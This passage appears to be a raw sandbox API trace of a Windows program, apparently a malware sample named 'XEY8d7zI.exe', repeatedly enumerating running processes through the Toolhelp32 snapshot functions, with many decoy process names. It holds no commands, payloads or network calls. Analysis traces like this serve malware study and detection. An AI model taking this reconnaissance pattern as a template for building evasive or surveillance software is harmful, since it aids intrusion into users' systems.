cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0153.404] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, 
szExeFile="audiodg.exe")) returned 1 [0153.405] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0153.406] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0153.407] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0153.408] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0153.410] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0153.411] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0153.412] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, 
szExeFile="dwm.exe")) returned 1 [0153.414] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0153.415] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0153.417] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0153.418] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0153.537] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0153.538] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0153.540] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, 
th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0153.541] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0153.543] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0153.544] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0153.545] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0153.547] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0153.548] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0153.550] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, 
cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0153.551] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0153.552] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0153.554] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0153.555] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0153.556] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0153.558] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0153.562] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, 
th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0153.563] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0153.564] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0153.565] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0153.567] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0153.568] CloseHandle (hObject=0xc4) returned 1 [0153.568] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0153.574] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0153.575] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 
[0153.618] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0153.619] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0153.620] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0153.620] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0153.621] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0153.621] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0153.622] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0153.623] 
Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0153.624] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0153.624] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0153.625] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0153.626] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0153.626] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0153.627] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0153.628] 
Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0153.628] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0153.629] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0153.630] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0153.631] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0153.632] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0153.633] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0153.635] 
Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0153.636] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0153.637] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0153.638] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0153.640] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0153.641] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0153.642] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, 
szExeFile="xplivecam.exe")) returned 1 [0153.643] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0153.644] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0153.645] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0153.647] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0153.648] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0153.649] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0153.650] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, 
dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0153.652] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0153.653] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0153.660] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0153.661] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0153.662] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0153.663] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0153.664] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, 
th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0153.665] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0153.666] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0153.667] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0153.669] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0153.670] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: 